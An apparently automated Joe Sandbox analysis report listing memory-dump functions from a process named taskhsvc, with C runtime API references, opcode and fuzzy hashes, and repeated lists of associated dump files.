Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$D_pollD_seedD_status
String ID: $
API String ID: 233213208-227171996
Opcode ID: daffa8b022e3d1689a39be690e44344c9e9366cde5e50962e6969b69039f3f8d
Instruction ID: 8de9e1be01bf70afdb46089da825c73ad65a811ddbae1e5154e83c105aeb5a47
Opcode Fuzzy Hash: daffa8b022e3d1689a39be690e44344c9e9366cde5e50962e6969b69039f3f8d
Instruction Fuzzy Hash: 7C21F9B0D193499FEB10EFB4D58979DBBF0AF44314F118A19E484A7281D3B89948EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00EB566D Relevance: 9.2, APIs: 6, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00EB56DD
abort.MSVCRT ref: 00EB572A
abort.MSVCRT ref: 00EB577F
__stack_chk_fail.LIBSSP-0 ref: 00EB5E18

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: abort$__stack_chk_fail
String ID:
API String ID: 2908038143-0
Opcode ID: 2ddd60721ce8a14bc6f602d8d7b0579c488a903f1a28e966dd2587539442b1a6
Instruction ID: e0256b9f0759ea6226e5196802de0591837aff170a73053116298b77307def08
Opcode Fuzzy Hash: 2ddd60721ce8a14bc6f602d8d7b0579c488a903f1a28e966dd2587539442b1a6
Instruction Fuzzy Hash: 4D61D074A042099FCB08EFA9D58579EBBF0BF48304F118869E894AB355DB78D984DF12

Uniqueness

Uniqueness Score: -1.00%

Function 00EE683A Relevance: 9.1, APIs: 6, Instructions: 113stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00EE59C4: _open.MSVCRT ref: 00EE5A44
Part of subcall function 00EE59C4: __stack_chk_fail.LIBSSP-0 ref: 00EE5A5A

strerror.MSVCRT ref: 00EE68C0
_lseek.MSVCRT ref: 00EE6919
_locking.MSVCRT ref: 00EE6944
strerror.MSVCRT ref: 00EE6972
_close.MSVCRT ref: 00EE69B7
__stack_chk_fail.LIBSSP-0 ref: 00EE69FB

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strerror$_close_locking_lseek_open
String ID:
API String ID: 2717617813-0
Opcode ID: cc03f694d29f6c217c3edd54a6a893490a5b8530e932a3ef3bde2513541263ee
Instruction ID: 1594aa85bac7e3535c57b2c38eb993eb76b5a3e73f2483458a46dd2ca3940a5a
Opcode Fuzzy Hash: cc03f694d29f6c217c3edd54a6a893490a5b8530e932a3ef3bde2513541263ee
Instruction Fuzzy Hash: 8551C3B4A083498FD704DFA8C5857AEBBF0BF88344F109829E498EB351D779A944CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D931E0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

time.MSVCRT ref: 00D9322A
__stack_chk_fail.LIBSSP-0 ref: 00D936D9

Strings

conn, xrefs: 00D93524
../src/or/main.c, xrefs: 00D93518

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failtime
String ID: ../src/or/main.c$conn
API String ID: 2434642342-3639683924
Opcode ID: 0eac93d1aa51f36b7d01d02a278fb166624939a2ca6809cbe8bc523da445213a
Instruction ID: c4b86860bb87db94acc0d4bdefed8eaf2102b9357255ee58f433bf1bb69757c6
Opcode Fuzzy Hash: 0eac93d1aa51f36b7d01d02a278fb166624939a2ca6809cbe8bc523da445213a
Instruction Fuzzy Hash: A4F1C5B49082599FCB40EFA9C185AADFBF0FF48310F05895AE894AB352D734E944DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00D956C3 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

time.MSVCRT ref: 00D956F9

Part of subcall function 00EF545C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00D9A788), ref: 00EF5486

Part of subcall function 00DD8197: __stack_chk_fail.LIBSSP-0 ref: 00DD8216

free.MSVCRT ref: 00D958EB
free.MSVCRT ref: 00D959A4
__stack_chk_fail.LIBSSP-0 ref: 00D959FE

Strings

c, xrefs: 00D959B6

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$free$time
String ID: c
